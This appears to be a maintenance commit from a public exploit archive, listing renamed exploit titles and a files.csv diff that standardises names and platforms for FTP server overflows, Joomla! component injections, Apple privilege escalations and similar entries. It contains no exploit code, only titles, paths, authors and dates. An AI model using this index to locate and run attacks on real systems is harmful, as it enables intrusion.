DB: 2016-11-02

12 new exploits

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)

KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow

Apple iOS 4.0.3 - DPAP Server Denial of Service

KarjaSoft Sami FTP Server 2.02 - USER Overflow (Metasploit)
KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)

Freefloat FTP Server - (LIST command) Buffer Overflow
Freefloat FTP Server - 'LIST' Command Buffer Overflow
Freefloat FTP Server 1.00 - MKD Buffer Overflow
Freefloat FTP Server - MKD Buffer Overflow (Metasploit)
Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow
Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow
Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow

Freefloat FTP Server - REST Buffer Overflow (Metasploit)
Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)

Freefloat FTP Server 1.0 - ACCL Buffer Overflow
Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow

Nagios Plugin check_ups - Local Buffer Overflow (PoC)
Nagios Plugins check_ups - Local Buffer Overflow (PoC)

Joomla! Component KISS Advertiser - Remote File / Bypass Upload
Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload

Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload

Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection
Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection

Joomla! Extension Movm Extension (com_movm) - SQL Injection
Joomla! Component 'com_movm' - SQL Injection

Joomla! Component joomgalaxy 1.2.0.4 - Multiple Vulnerabilities
Joomla! Component 'com_joomgalaxy' 1.2.0.4 - Multiple Vulnerabilities

Joomla! Component En Masse 1.2.0.4 - SQL Injection
Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection

Joomla! Component FireBoard (com_fireboard) - SQL Injection
Joomla! Component 'com_fireboard' - SQL Injection

Joomla! Component Spider Calendar Lite (com_spidercalendar) - SQL Injection
Joomla! Component 'com_spidercalendar' - SQL Injection

Joomla! Component RokModule - 'index.php module Parameter' Blind SQL Injection
Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection

Joomla! Component iCagenda - (id Parameter) Multiple Vulnerabilities
Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities
Joomla! Component FreeStyle Support com_fss 1.9.1.1447 - SQL Injection
Joomla! Component Tags - 'index.php tag Parameter' SQL Injection
Joomla! Component 'com_fss' 1.9.1.1447 - SQL Injection
Joomla! Component 'com_tag' - 'tag' Parameter SQL Injection
Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection
Joomla! Component Kunena - 'index.php search Parameter' SQL Injection
Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection
Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection

Freefloat FTP Server - PUT Command Buffer Overflow
Freefloat FTP Server - 'PUT' Command Buffer Overflow

Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection
Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection

Free Float FTP Server - USER Command Buffer Overflow
Freefloat FTP Server - 'USER' Command Buffer Overflow

Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities
Joomla! Component 'com_jooproperty' 1.13.0 - Multiple Vulnerabilities

Joomla! Component Spider Calendar - 'index.php date Parameter' Blind SQL Injection
Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection

Joomla! Component com_collector - Arbitrary File Upload
Joomla! Component 'com_collector' - Arbitrary File Upload

Freefloat FTP 1.0 - Raw Commands Buffer Overflow
Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow

Joomla! 3.0.2 - (highlight.php) PHP Object Injection
Joomla! 3.0.2 - 'highlight.php' PHP Object Injection

Joomla! Component RSfiles - (cid parameter) SQL Injection
Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection

Joomla! Component CiviCRM 4.2.2 - Remote Code Injection
Joomla! Component 'com_civicrm' 4.2.2 - Remote Code Injection

Freefloat FTP 1.0 - DEP Bypass with ROP
Freefloat FTP Server 1.0 - DEP Bypass with ROP

Joomla! 3.0.3 - (remember.php) PHP Object Injection
Joomla! 3.0.3 - 'remember.php' PHP Object Injection

Joomla! Extension DJ Classifieds 2.0 - Blind SQL Injection
Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection

Joomla! Component S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection
Joomla! Component 'com_s5clanroster' - 'id' Parameter SQL Injection

Joomla! Component Sectionex 2.5.96 - SQL Injection
Joomla! Component 'com_sectionex' 2.5.96 - SQL Injection

Joomla! Component redSHOP 1.2 - SQL Injection
Joomla! Component 'com_redshop' 1.2 - SQL Injection

Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)
Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)

Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service

check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read
Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read

check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition
Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition

Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation
Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload
Joomla! Component jFancy - 'script.php' Arbitrary File Upload
Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload
Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload

Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload
Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload
Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component JCal Pro Calendar - SQL Injection
Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'com_jcalpro' - SQL Injection

Joomla! Component com_szallasok - 'id' Parameter SQL Injection
Joomla! Component 'com_szallasok' - 'id' Parameter SQL Injection

Joomla! Module Language Switcher 2.5.x - Multiple Cross-Site Scripting Vulnerabilities
My Little Forum 2.3.7 - Multiple Vulnerabilities

Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion

Joomla! Component Odudeprofile - 'profession' Parameter SQL Injection
Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection

Joomla! Component com_photo - Multiple SQL Injections
Joomla! Component 'com_photo' - Multiple SQL Injections

Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities
Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities

Joomla! Component Komento - 'cid' Parameter SQL Injection
Joomla! Component 'Komento' - 'cid' Parameter SQL Injection

Joomla! Component com_quiz - SQL Injection
Joomla! Component 'com_quiz' - SQL Injection

Joomla! Component com_parcoauto - 'idVeicolo' Parameter SQL Injection
Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection
Joomla! Component ZT Autolinks - 'Controller' Parameter Local File Inclusion
Joomla! Component Bit - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion

Joomla! Component Incapsula - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation

Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)
Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)

Joomla! Component RokDownloads - Arbitrary File Upload
Joomla! Component 'com_rokdownloads' - Arbitrary File Upload

Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation
Apple Intel HD 3000 Graphics Driver 10.0.0 - Privilege Escalation

MyLittleForum 2.3.5 - PHP Command Injection
My Little Forum 2.3.5 - PHP Command Injection
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free
OS X/iOS Kernel - IOSurface Use-After-Free
OS X/iOS - mach_ports_register Multiple Memory Safety Issues
Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free
Apple OS X/iOS - Kernel IOSurface Use-After-Free
Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues

MacOS 10.12 - 'task_t' Privilege Escalation
Apple MacOS 10.12 - 'task_t' Privilege Escalation
Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow
School Registration and Fee System - Authentication Bypass
Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow
MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation

files.csv

@@ -2804,7 +2804,7 @@ id,file,description,date,author,platform,type,port
 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0
 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
-3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
+3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
 3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
 3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
@@ -2815,7 +2815,7 @@ id,file,description,date,author,platform,type,port
 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
 3138,platforms/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0
 3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0
-3140,platforms/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21
+3140,platforms/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21
 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0
 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos,0
 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0
@@ -4795,7 +4795,7 @@ id,file,description,date,author,platform,type,port
 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0
-5151,platforms/osx/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",osx,dos,0
+5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0
 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,multiple,dos,0
 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0
 5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0
@@ -14514,7 +14514,7 @@ id,file,description,date,author,platform,type,port
 16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,3306
-16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
+16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
 16703,platforms/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
@@ -15236,7 +15236,7 @@ id,file,description,date,author,platform,type,port
 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion",2011-07-09,Or4nG.M4N,php,webapps,0
 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0
 17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 - 'pid' Arbitrary File Deletion",2011-07-10,LiquidWorm,php,webapps,0
-17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - (LIST command) Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0
+17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Command Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0
 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)",2011-07-10,Metasploit,windows,remote,0
 17522,platforms/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0
 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0
@@ -15252,17 +15252,17 @@ id,file,description,date,author,platform,type,port
 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0
 40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0
 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0
-17539,platforms/windows/remote/17539.rb,"Freefloat FTP Server 1.00 - MKD Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0
-17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0
+17539,platforms/windows/remote/17539.rb,"Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0
+17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0
 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow (Metasploit)",2011-07-17,Metasploit,windows,remote,0
 17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
-17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0
+17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0
 17553,platforms/php/webapps/17553.txt,"Joomla! Component Appointment Booking Pro - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
-17548,platforms/windows/remote/17548.rb,"Freefloat FTP Server - REST Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0
+17548,platforms/windows/remote/17548.rb,"Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0
 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0
-17550,platforms/windows/remote/17550.py,"Freefloat FTP Server 1.0 - ACCL Buffer Overflow",2011-07-19,mortis,windows,remote,0
+17550,platforms/windows/remote/17550.py,"Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow",2011-07-19,mortis,windows,remote,0
 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE K2 Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
@@ -15862,7 +15862,7 @@ id,file,description,date,author,platform,type,port
 18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0
 18276,platforms/php/webapps/18276.txt,"WordPress Plugin Mailing List - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0
 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0
-18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0
+18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0
 18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0
 18412,platforms/php/webapps/18412.php,"WordPress Plugin Kish Guest Posting 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0
@@ -17163,7 +17163,7 @@ id,file,description,date,author,platform,type,port
 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0
 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0
 19791,platforms/php/webapps/19791.txt,"WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",php,webapps,0
-19792,platforms/php/webapps/19792.txt,"Joomla! Component KISS Advertiser - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
+19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0
 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0
 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0
@@ -17201,7 +17201,7 @@ id,file,description,date,author,platform,type,port
 19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
 19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote,0
-19829,platforms/php/webapps/19829.txt,"Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
+19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
 19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,102
 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080
 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0
@@ -17513,10 +17513,10 @@ id,file,description,date,author,platform,type,port
 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0
 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0
-20166,platforms/php/webapps/20166.txt,"Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0
+20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0
 20167,platforms/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,linux,dos,0
 20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0
-20170,platforms/php/webapps/20170.txt,"Joomla! Extension Movm Extension (com_movm) - SQL Injection",2012-08-01,D4NB4R,php,webapps,0
+20170,platforms/php/webapps/20170.txt,"Joomla! Component 'com_movm' - SQL Injection",2012-08-01,D4NB4R,php,webapps,0
 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0
 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0
 20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary .PHP File Upload (Metasploit)",2012-08-02,Metasploit,php,webapps,0
@@ -17542,7 +17542,7 @@ id,file,description,date,author,platform,type,port
 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0
 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote,0
 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd & /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
-20197,platforms/php/webapps/20197.txt,"Joomla! Component joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0
+20197,platforms/php/webapps/20197.txt,"Joomla! Component 'com_joomgalaxy' 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0
 20198,platforms/php/webapps/20198.txt,"am4ss 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0
 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 - PHP Code Injection",2012-08-02,i-Hmx,php,webapps,0
 20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",windows,remote,0
@@ -17685,7 +17685,7 @@ id,file,description,date,author,platform,type,port
 20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0
 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0
 20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0
-20343,platforms/php/webapps/20343.pl,"Joomla! Component En Masse 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0
+20343,platforms/php/webapps/20343.pl,"Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0
 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0
 20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0
 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0
@@ -17731,7 +17731,7 @@ id,file,description,date,author,platform,type,port
 20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 - registrar Local Arbitrary File Read",2000-11-08,"J.A. Gutierrez",hp-ux,local,0
 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0
-20390,platforms/php/webapps/20390.txt,"Joomla! Component FireBoard (com_fireboard) - SQL Injection",2012-08-09,Vulnerability-Lab,php,webapps,0
+20390,platforms/php/webapps/20390.txt,"Joomla! Component 'com_fireboard' - SQL Injection",2012-08-09,Vulnerability-Lab,php,webapps,0
 20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0
 20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)",2012-08-10,Metasploit,windows,remote,0
 20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps,0
@@ -18297,7 +18297,7 @@ id,file,description,date,author,platform,type,port
 20980,platforms/windows/remote/20980.c,"Oracle 8i - TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote,0
 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0
 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0
-20983,platforms/php/webapps/20983.pl,"Joomla! Component Spider Calendar Lite (com_spidercalendar) - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
+20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
